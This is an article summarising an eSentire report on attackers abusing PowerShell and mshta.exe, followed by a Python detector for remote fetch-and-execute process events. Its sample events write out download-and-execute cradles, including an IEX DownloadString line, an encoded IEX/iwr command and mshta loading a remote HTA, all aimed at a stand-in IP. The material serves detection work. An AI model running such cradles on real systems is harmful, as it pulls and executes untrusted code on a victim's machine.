According to a new cyber threat report from eSentire, Inc., the largest pure-play Managed Detection and Response (MDR) provider, 91% of endpoint incidents detected in Q1 2018 involved known, legitimate binaries, such as PowerShell or mshta.exe.
"eSentire Threat Intelligence data shows heavy use of legitimate Microsoft binaries, such as PowerShell and mshta.exe, popular tools for downloading and executing malicious code in the initial stages of a malware infection," said Eldon Sprickerhoff, founder and chief security strategist, eSentire.
eSentire Threat Intelligence reports that 91% of critical Q1 2018 security events resulted from endpoint events in which malicious code was retrieved from a remote source and executed through a known, legitimate binary such as PowerShell or MSHTA. These processes are used by opportunistic and targeted threats alike, allowing attackers to circumvent basic controls (signature-based antivirus and application allow-lists that trust Microsoft-signed binaries) in order to deliver and install malware.
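The pattern the report describes, a trusted Microsoft binary fetching code from a remote source and running it in memory, is detectable from process-creation telemetry alone. The following detection logic is an added example written for this article; it is not eSentire code and is not taken from the report. It assumes Sysmon Event ID 1-style records (Image, CommandLine, ProcessId fields) and runs over a handful of constructed events, including a benign administrative PowerShell invocation that must not fire.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field

# Binaries the report names, plus pwsh.exe (the newer PowerShell host).
# Assumption: the report itself does not mention pwsh.exe.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Common PowerShell download cradles: Net.WebClient, Invoke-WebRequest and its aliases, BITS.
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|"
    r"Invoke-RestMethod|\birm\b|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
# In-memory execution of fetched text.
EXEC_RE = re.compile(r"Invoke-Expression|\biex\b", re.IGNORECASE)
# -EncodedCommand and its accepted abbreviations, followed by the base64 payload.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# mshta.exe executes script handed to it directly as a protocol-handler URI.
MSHTA_INLINE_RE = re.compile(r"\b(?:vbscript|javascript):", re.IGNORECASE)


@dataclass
class Finding:
    pid: int
    image: str
    reasons: list = field(default_factory=list)


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE plaintext of a -EncodedCommand payload, or None if absent/invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_event(event: dict):
    """Return a Finding when a LOLBin process-creation event looks like remote fetch-and-execute."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image not in LOLBINS:
        return None
    cmdline = event["CommandLine"]
    reasons = []
    text = cmdline
    # Decode -EncodedCommand so the cradle is inspected in cleartext, not hidden behind base64.
    decoded = decode_encoded_command(cmdline) if image != "mshta.exe" else None
    if decoded is not None:
        text += "\n" + decoded
        reasons.append("encoded command decodes to: " + decoded.strip())
    url = URL_RE.search(text)
    if image == "mshta.exe":
        if url:
            reasons.append("mshta fetching remote HTA: " + url.group(0))
        if MSHTA_INLINE_RE.search(text):
            reasons.append("mshta running inline script via protocol handler")
    else:
        fetch = DOWNLOAD_RE.search(text)
        execute = EXEC_RE.search(text)
        if fetch and execute:
            reasons.append(f"download cradle ({fetch.group(0)}) fed to {execute.group(0)}")
        if fetch and url:
            reasons.append("remote URL in PowerShell download: " + url.group(0))
    return Finding(event["ProcessId"], image, reasons) if reasons else None


def scan(events):
    return [f for f in (analyze_event(e) for e in events) if f is not None]


def _enc(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed Sysmon-style records for illustration; not real telemetry. 203.0.113.0/24 is a
# documentation range.
SAMPLE_EVENTS = [
    {"ProcessId": 4101, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://203.0.113.10/update.hta"},
    {"ProcessId": 4102, "Image": PS_IMAGE,
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/a.ps1')\""},
    {"ProcessId": 4103, "Image": PS_IMAGE,
     "CommandLine": "powershell.exe -w hidden -enc "
                    + _enc("IEX (iwr http://203.0.113.10/b.ps1 -UseBasicParsing).Content")},
    {"ProcessId": 4104, "Image": PS_IMAGE,  # benign scheduled task: local script, no fetch
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"},
    {"ProcessId": 4105, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe \"javascript:a=new ActiveXObject('WScript.Shell');"
                    "a.Run('calc.exe');close()\""},
    {"ProcessId": 4106, "Image": r"C:\Windows\notepad.exe",  # not a LOLBin of interest
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"PID {f.pid} {f.image}:")
        for r in f.reasons:
            print("   -", r)
```

Two points matter in practice. First, the encoded-command branch is what separates a useful rule from a trivial one: the cradle in event 4103 contains no literal "http" or "IEX" on the command line, so a plain string match would miss it. Second, the PowerShell branch requires a download cradle together with either in-memory execution or a remote URL, so that `-File` invocations of local scripts (event 4104) stay quiet; environments that legitimately use Invoke-WebRequest from PowerShell will still need an allow-list of known destinations or parent processes layered on top.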